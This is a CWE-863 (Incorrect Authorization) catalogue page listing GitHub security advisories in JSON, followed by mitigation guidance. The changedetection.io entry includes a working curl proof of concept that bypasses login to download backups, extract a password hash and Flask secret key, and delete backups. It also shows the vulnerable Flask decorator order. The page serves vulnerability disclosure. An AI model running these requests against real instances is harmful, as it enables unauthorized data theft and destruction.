CWE-863
Allowed-with-ReviewIncorrect Authorization
Abstraction: Class · Status: Incomplete
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
5504 vulnerabilities reference this CWE, most recent first.
GHSA-JMF8-XH4V-2PR9
Vulnerability from github – Published: 2023-09-04 12:30 – Updated: 2024-04-04 07:25The Media from FTP WordPress plugin before 11.17 does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.
{
"affected": [],
"aliases": [
"CVE-2023-4019"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-04T12:15:10Z",
"severity": "HIGH"
},
"details": "The Media from FTP WordPress plugin before 11.17 does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.",
"id": "GHSA-jmf8-xh4v-2pr9",
"modified": "2024-04-04T07:25:58Z",
"published": "2023-09-04T12:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4019"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-JMFH-38X7-P523
Vulnerability from github – Published: 2024-12-20 15:30 – Updated: 2024-12-20 15:30In JetBrains TeamCity before 2024.12 improper access control allowed viewing details of unauthorized agents
{
"affected": [],
"aliases": [
"CVE-2024-56348"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-20T15:15:05Z",
"severity": "MODERATE"
},
"details": "In JetBrains TeamCity before 2024.12 improper access control allowed viewing details of unauthorized agents",
"id": "GHSA-jmfh-38x7-p523",
"modified": "2024-12-20T15:30:48Z",
"published": "2024-12-20T15:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56348"
},
{
"type": "WEB",
"url": "https://www.jetbrains.com/privacy-security/issues-fixed"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-JMG4-X4VP-6C6X
Vulnerability from github – Published: 2022-05-13 01:18 – Updated: 2024-04-12 21:13When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.geode:geode-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-15695"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-08T14:16:18Z",
"nvd_published_at": "2018-06-13T17:29:00Z",
"severity": "HIGH"
},
"details": "When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.",
"id": "GHSA-jmg4-x4vp-6c6x",
"modified": "2024-04-12T21:13:17Z",
"published": "2022-05-13T01:18:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15695"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/pull/1258"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/00be4f9774e1adf8e7ccc2664da8005fc30bb11d"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/49d28f93fd2ef069693ce15d124ef3a29f22fb7d"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/6df14c8b1e3c644f9f810149e80bba0c2f073dab"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/740289c61d60256c6270756bc84b9e24b76e4913"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/90f8f6242927c5e16da64f38bba9abf3d450a305"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/954ccb545d24a9c9a35cbd84023a4d7e07032de0"
},
{
"type": "WEB",
"url": "https://github.com/apache/geode/commit/aa469239860778eb46e09dd7b390aee08f152480"
},
{
"type": "WEB",
"url": "https://cwiki.apache.org/confluence/display/GEODE/Release+Notes#ReleaseNotes-SecurityVulnerabilities"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/geode"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/GEODE-3974"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/dc8875c0b924885a884eba6d5bd7dc3f123411b2d33cffd00e351c99@%3Cuser.geode.apache.org%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Geode vulnerable to Incorrect Authorization"
}
GHSA-JMP9-X22R-554X
Vulnerability from github – Published: 2025-09-16 15:32 – Updated: 2025-09-16 21:34The Spring Framework annotation detection mechanism may not correctly resolve annotations on methods within type hierarchies with a parameterized super type with unbounded generics. This can be an issue if such annotations are used for authorization decisions.
Your application may be affected by this if you are using Spring Security's @EnableMethodSecurity feature.
You are not affected by this if you are not using @EnableMethodSecurity or if you do not use security annotations on methods in generic superclasses or generic interfaces.
This CVE is published in conjunction with CVE-2025-41248 https://spring.io/security/cve-2025-41248 .
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-core"
},
"ranges": [
{
"events": [
{
"introduced": "5.3.0"
},
{
"last_affected": "5.3.44"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-core"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"last_affected": "6.1.22"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.2.10"
},
"package": {
"ecosystem": "Maven",
"name": "org.springframework:spring-core"
},
"ranges": [
{
"events": [
{
"introduced": "6.2.0"
},
{
"fixed": "6.2.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-41249"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-16T19:38:20Z",
"nvd_published_at": "2025-09-16T11:15:30Z",
"severity": "HIGH"
},
"details": "The Spring Framework annotation detection mechanism may not correctly resolve annotations on methods within type hierarchies with a parameterized super type with unbounded generics. This can be an issue if such annotations are used for authorization decisions.\n\nYour application may be affected by this if you are using Spring Security\u0027s @EnableMethodSecurity\u00a0feature.\n\nYou are not affected by this if you are not using @EnableMethodSecurity\u00a0or if you do not use security annotations on methods in generic superclasses or generic interfaces.\n\nThis CVE is published in conjunction with CVE-2025-41248 https://spring.io/security/cve-2025-41248 .",
"id": "GHSA-jmp9-x22r-554x",
"modified": "2025-09-16T21:34:22Z",
"published": "2025-09-16T15:32:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41249"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/issues/35342"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/commit/6d710d482a6785b069e35022e81758953afc21ff"
},
{
"type": "PACKAGE",
"url": "https://github.com/spring-projects/spring-framework"
},
{
"type": "WEB",
"url": "https://github.com/spring-projects/spring-framework/releases/tag/v6.2.11"
},
{
"type": "WEB",
"url": "https://spring.io/security/cve-2025-41249"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Spring Framework annotation detection mechanism may result in improper authorization"
}
GHSA-JMRH-XMGH-X9J4
Vulnerability from github – Published: 2026-04-06 18:00 – Updated: 2026-06-05 14:27Summary
On 13 routes across 5 blueprint files, the @login_optionally_required decorator is placed before (outer to) @blueprint.route() instead of after it. In Flask, @route() must be the outermost decorator because it registers the function it receives. When the order is reversed, @route() registers the original undecorated function, and the auth wrapper is never in the call chain. This silently disables authentication on these routes.
The developer correctly uses the decorator on 30+ other routes with the proper order, making this a classic consistency gap.
Details
Correct order (used on 30+ routes):
@blueprint.route('/settings', methods=['GET'])
@login_optionally_required
def settings():
...
Incorrect order (13 vulnerable routes):
@login_optionally_required # ← Applied to return value of @route, NOT the view
@blueprint.route('/backups/download/<filename>') # ← Registers raw function
def download_backup(filename):
...
POC
=== PHASE 1: Confirm Authentication is Required ===
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/
Main page: HTTP 302 -> http://127.0.0.1:5557/login?next=/
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/settings
Settings page: HTTP 302 (auth required, redirects to login)
Password is set. Unauthenticated requests to / and /settings
are properly redirected to /login.
=== PHASE 2: Authentication Bypass on Backup Routes ===
(All requests made WITHOUT any session cookie)
--- Exploit 1: Trigger backup creation ---
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/backups/request-backup
Response: HTTP 302 -> http://127.0.0.1:5557/backups/
(302 redirects to /backups/ listing page, NOT to /login -- backup was created)
--- Exploit 2: List backups page ---
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/backups/
Response: HTTP 200
--- Exploit 3: Extract backup filenames ---
$ curl -s http://127.0.0.1:5557/backups/ | grep changedetection-backup
Found: changedetection-backup-20260331005425.zip
--- Exploit 4: Download backup without authentication ---
$ curl -s -o /tmp/stolen_backup.zip http://127.0.0.1:5557/backups/download/changedetection-backup-20260331005425.zip
Response: HTTP 200
$ file /tmp/stolen_backup.zip
/tmp/stolen_backup.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
$ ls -la /tmp/stolen_backup.zip
-rw-r--r-- 1 root root 92559 Mar 31 00:54 /tmp/stolen_backup.zip
$ unzip -l /tmp/stolen_backup.zip
Archive: /tmp/stolen_backup.zip
Length Date Time Name
--------- ---------- ----- ----
26496 2026-03-31 00:54 url-watches.json
64 2026-03-31 00:52 secret.txt
51 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/history.txt
1682 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/4b7f61d9f981b92103a6659f0d79a93e.txt.br
4395 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/1774911131.html.br
40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/6b3a3023b357a0ea25fc373c7e358ce2.txt.br
51 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/history.txt
40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/1774911131.html.br
73 2026-03-31 00:54 url-list.txt
155 2026-03-31 00:54 url-list-with-tags.txt
--------- -------
114721 10 files
--- Exploit 5: Extract sensitive data from backup ---
Application password hash: pG+Bq6s4/EhsRqYZYc7kiGEG1QMd2hMuadD5qCMbSBcRIMnGTATliX/P0vFX...
Watched URLs:
- https://news.ycombinator.com/ (UUID: 4ff247a9...)
- https://changedetection.io/CHANGELOG.txt (UUID: c8d85001...)
Flask secret key: 7cb14f56dc4f26761a22e7d35cc7b6911bfaa5e0790d2b58dadba9e529e5a4d6
--- Exploit 6: Delete all backups without auth ---
$ curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:5557/backups/remove-backups
Response: HTTP 302
=== PHASE 3: Cross-Verification ===
Verify protected routes still require auth:
/ -> HTTP 302 (302 = protected)
/settings -> HTTP 302 (302 = protected)
=== RESULTS ===
PROTECTED routes (auth required, HTTP 302 -> /login):
/ HTTP 302
/settings HTTP 302
BYPASSED routes (no auth needed):
/backups/request-backup HTTP 302 (triggers backup creation, redirects to /backups/ not /login)
/backups/ HTTP 200 (lists all backups)
/backups/download/<file> HTTP 200 (downloads backup with secrets)
/backups/remove-backups HTTP 302 (deletes all backups)
[+] CONFIRMED: Authentication bypass on backup routes!
Impact
- Complete data exfiltration — Backups contain all monitored URLs, notification webhook URLs (which may contain API tokens for Slack, Discord, etc.), and configuration
- Backup restore = config injection — Attacker can upload a malicious backup with crafted watch configs
- SSRF — Proxy check endpoint can be triggered to scan internal network
- Browser session hijacking — Browser steps endpoints allow controlling Playwright sessions
Remediation
Swap the decorator order on all 13 routes. @blueprint.route() must be outermost:
# Before (VULNERABLE):
@login_optionally_required
@blueprint.route('/backups/download/<filename>')
def download_backup(filename):
# After (FIXED):
@blueprint.route('/backups/download/<filename>')
@login_optionally_required
def download_backup(filename):
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.54.7"
},
"package": {
"ecosystem": "PyPI",
"name": "changedetection.io"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.54.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35490"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-06T18:00:01Z",
"nvd_published_at": "2026-04-07T16:16:27Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nOn 13 routes across 5 blueprint files, the `@login_optionally_required` decorator is placed **before** (outer to) `@blueprint.route()` instead of after it. In Flask, `@route()` must be the outermost decorator because it registers the function it receives. When the order is reversed, `@route()` registers the **original undecorated function**, and the auth wrapper is never in the call chain. This silently disables authentication on these routes.\n\nThe developer correctly uses the decorator on 30+ other routes with the proper order, making this a classic consistency gap.\n\n### Details\n\n**Correct order (used on 30+ routes):**\n```python\n@blueprint.route(\u0027/settings\u0027, methods=[\u0027GET\u0027])\n@login_optionally_required\ndef settings():\n ...\n```\n\n**Incorrect order (13 vulnerable routes):**\n```python\n@login_optionally_required # \u2190 Applied to return value of @route, NOT the view\n@blueprint.route(\u0027/backups/download/\u003cfilename\u003e\u0027) # \u2190 Registers raw function\ndef download_backup(filename):\n ...\n```\n\n## POC\n```\n=== PHASE 1: Confirm Authentication is Required ===\n\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/\nMain page: HTTP 302 -\u003e http://127.0.0.1:5557/login?next=/\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/settings\nSettings page: HTTP 302 (auth required, redirects to login)\n\nPassword is set. Unauthenticated requests to / and /settings\nare properly redirected to /login.\n\n=== PHASE 2: Authentication Bypass on Backup Routes ===\n(All requests made WITHOUT any session cookie)\n\n--- Exploit 1: Trigger backup creation ---\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/backups/request-backup\nResponse: HTTP 302 -\u003e http://127.0.0.1:5557/backups/\n(302 redirects to /backups/ listing page, NOT to /login -- backup was created)\n\n--- Exploit 2: List backups page ---\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/backups/\nResponse: HTTP 200\n\n--- Exploit 3: Extract backup filenames ---\n$ curl -s http://127.0.0.1:5557/backups/ | grep changedetection-backup\nFound: changedetection-backup-20260331005425.zip\n\n--- Exploit 4: Download backup without authentication ---\n$ curl -s -o /tmp/stolen_backup.zip http://127.0.0.1:5557/backups/download/changedetection-backup-20260331005425.zip\nResponse: HTTP 200\n\n$ file /tmp/stolen_backup.zip\n/tmp/stolen_backup.zip: Zip archive data, at least v2.0 to extract, compression method=deflate\n\n$ ls -la /tmp/stolen_backup.zip\n-rw-r--r-- 1 root root 92559 Mar 31 00:54 /tmp/stolen_backup.zip\n\n$ unzip -l /tmp/stolen_backup.zip\nArchive: /tmp/stolen_backup.zip\n Length Date Time Name\n--------- ---------- ----- ----\n 26496 2026-03-31 00:54 url-watches.json\n 64 2026-03-31 00:52 secret.txt\n 51 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/history.txt\n 1682 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/4b7f61d9f981b92103a6659f0d79a93e.txt.br\n 4395 2026-03-31 00:52 4ff247a9-0d8e-4308-8569-f6137fa76e0d/1774911131.html.br\n 40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/6b3a3023b357a0ea25fc373c7e358ce2.txt.br\n 51 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/history.txt\n 40877 2026-03-31 00:52 c8d85001-19d1-47a1-a8dc-f45876789215/1774911131.html.br\n 73 2026-03-31 00:54 url-list.txt\n 155 2026-03-31 00:54 url-list-with-tags.txt\n--------- -------\n 114721 10 files\n\n--- Exploit 5: Extract sensitive data from backup ---\nApplication password hash: pG+Bq6s4/EhsRqYZYc7kiGEG1QMd2hMuadD5qCMbSBcRIMnGTATliX/P0vFX...\nWatched URLs:\n - https://news.ycombinator.com/ (UUID: 4ff247a9...)\n - https://changedetection.io/CHANGELOG.txt (UUID: c8d85001...)\n\nFlask secret key: 7cb14f56dc4f26761a22e7d35cc7b6911bfaa5e0790d2b58dadba9e529e5a4d6\n\n--- Exploit 6: Delete all backups without auth ---\n$ curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:5557/backups/remove-backups\nResponse: HTTP 302\n\n=== PHASE 3: Cross-Verification ===\n\nVerify protected routes still require auth:\n / -\u003e HTTP 302 (302 = protected)\n /settings -\u003e HTTP 302 (302 = protected)\n\n=== RESULTS ===\n\nPROTECTED routes (auth required, HTTP 302 -\u003e /login):\n / HTTP 302\n /settings HTTP 302\n\nBYPASSED routes (no auth needed):\n /backups/request-backup HTTP 302 (triggers backup creation, redirects to /backups/ not /login)\n /backups/ HTTP 200 (lists all backups)\n /backups/download/\u003cfile\u003e HTTP 200 (downloads backup with secrets)\n /backups/remove-backups HTTP 302 (deletes all backups)\n\n[+] CONFIRMED: Authentication bypass on backup routes!\n```\n\n### Impact\n\n- **Complete data exfiltration** \u2014 Backups contain all monitored URLs, notification webhook URLs (which may contain API tokens for Slack, Discord, etc.), and configuration\n- **Backup restore = config injection** \u2014 Attacker can upload a malicious backup with crafted watch configs\n- **SSRF** \u2014 Proxy check endpoint can be triggered to scan internal network\n- **Browser session hijacking** \u2014 Browser steps endpoints allow controlling Playwright sessions\n\n### Remediation\n\nSwap the decorator order on all 13 routes. `@blueprint.route()` must be outermost:\n\n```python\n# Before (VULNERABLE):\n@login_optionally_required\n@blueprint.route(\u0027/backups/download/\u003cfilename\u003e\u0027)\ndef download_backup(filename):\n\n# After (FIXED):\n@blueprint.route(\u0027/backups/download/\u003cfilename\u003e\u0027)\n@login_optionally_required\ndef download_backup(filename):\n```",
"id": "GHSA-jmrh-xmgh-x9j4",
"modified": "2026-06-05T14:27:00Z",
"published": "2026-04-06T18:00:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-jmrh-xmgh-x9j4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35490"
},
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/commit/31a760c2147e3e73a403baf6d7de34dc50429c85"
},
{
"type": "PACKAGE",
"url": "https://github.com/dgtlmoon/changedetection.io"
},
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.8"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/changedetection-io/PYSEC-2026-28.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "changedetection.io Vulnerable to Authentication Bypass via Decorator Ordering"
}
GHSA-JMV4-P83R-GRW3
Vulnerability from github – Published: 2026-07-07 15:32 – Updated: 2026-07-07 15:32This vulnerability allows an unauthenticated actor to bypass authentication and gain access to restricted resources on the device.
{
"affected": [],
"aliases": [
"CVE-2026-12352"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-07T15:16:42Z",
"severity": "MODERATE"
},
"details": "This vulnerability allows an unauthenticated actor to bypass authentication and gain access to restricted resources on the device.",
"id": "GHSA-jmv4-p83r-grw3",
"modified": "2026-07-07T15:32:57Z",
"published": "2026-07-07T15:32:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12352"
},
{
"type": "WEB",
"url": "https://www.digi.com/resources/security"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-JMW9-579M-CW2X
Vulnerability from github – Published: 2022-05-24 17:21 – Updated: 2022-05-24 17:21OAuth flow missing verification checks CE/EE 12.3 and later through 13.0.1 allows unverified user to use OAuth authorization code flow
{
"affected": [],
"aliases": [
"CVE-2020-13272"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-06-19T22:15:00Z",
"severity": "MODERATE"
},
"details": "OAuth flow missing verification checks CE/EE 12.3 and later through 13.0.1 allows unverified user to use OAuth authorization code flow",
"id": "GHSA-jmw9-579m-cw2x",
"modified": "2022-05-24T17:21:19Z",
"published": "2022-05-24T17:21:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13272"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/743556"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-13272.json"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/37038"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-JP4X-W9CJ-97Q7
Vulnerability from github – Published: 2025-06-13 20:46 – Updated: 2025-06-13 20:46Impact
Any XWiki user with edit right on at least one App Within Minutes application (the default for all users XWiki) can obtain programming right/perform remote code execution by editing the application. The detailed reproduction steps can be found in the original bug report.
Patches
This vulnerability has been fixed in XWiki 17.0.0, 16.4.7, and 16.10.3.
Workarounds
Restricting edit rights on all existing App Within Minutes applications to trusted users mitigates at least the PoC exploit, but we can't exclude that there are other ways to exploit this vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "7.2-milestone-2"
},
{
"fixed": "16.4.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "16.5.0-rc-1"
},
{
"fixed": "16.10.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "17.0.0-rc-1"
},
{
"fixed": "17.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-49586"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-13T20:46:21Z",
"nvd_published_at": "2025-06-13T18:15:22Z",
"severity": "HIGH"
},
"details": "### Impact\nAny XWiki user with edit right on at least one App Within Minutes application (the default for all users XWiki) can obtain programming right/perform remote code execution by editing the application. The detailed reproduction steps can be found in the [original bug report](https://jira.xwiki.org/browse/XWIKI-22719).\n\n### Patches\nThis vulnerability has been fixed in XWiki 17.0.0, 16.4.7, and 16.10.3.\n\n### Workarounds\nRestricting edit rights on all existing App Within Minutes applications to trusted users mitigates at least the PoC exploit, but we can\u0027t exclude that there are other ways to exploit this vulnerability.",
"id": "GHSA-jp4x-w9cj-97q7",
"modified": "2025-06-13T20:46:22Z",
"published": "2025-06-13T20:46:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-jp4x-w9cj-97q7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49586"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/ef978315649cf83eae396021bb33603a1a5f7e42"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-22719"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "XWiki allows remote code execution through preview of XClass changes in AWM editor"
}
GHSA-JP5H-88VF-2QP5
Vulnerability from github – Published: 2024-10-15 21:30 – Updated: 2024-10-15 21:30Vulnerability in the Oracle MES for Process Manufacturing product of Oracle E-Business Suite (component: Device Integration). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle MES for Process Manufacturing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle MES for Process Manufacturing accessible data as well as unauthorized access to critical data or complete access to all Oracle MES for Process Manufacturing accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
{
"affected": [],
"aliases": [
"CVE-2024-21277"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-15T20:15:19Z",
"severity": "HIGH"
},
"details": "Vulnerability in the Oracle MES for Process Manufacturing product of Oracle E-Business Suite (component: Device Integration). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle MES for Process Manufacturing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle MES for Process Manufacturing accessible data as well as unauthorized access to critical data or complete access to all Oracle MES for Process Manufacturing accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).",
"id": "GHSA-jp5h-88vf-2qp5",
"modified": "2024-10-15T21:30:39Z",
"published": "2024-10-15T21:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21277"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2024.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-JP63-FCQH-36RC
Vulnerability from github – Published: 2022-05-24 19:20 – Updated: 2025-10-22 00:32Microsoft Excel Security Feature Bypass Vulnerability
{
"affected": [],
"aliases": [
"CVE-2021-42292"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-10T01:19:00Z",
"severity": "HIGH"
},
"details": "Microsoft Excel Security Feature Bypass Vulnerability",
"id": "GHSA-jp63-fcqh-36rc",
"modified": "2025-10-22T00:32:26Z",
"published": "2022-05-24T19:20:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42292"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42292"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-42292"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
No CAPEC attack patterns related to this CWE.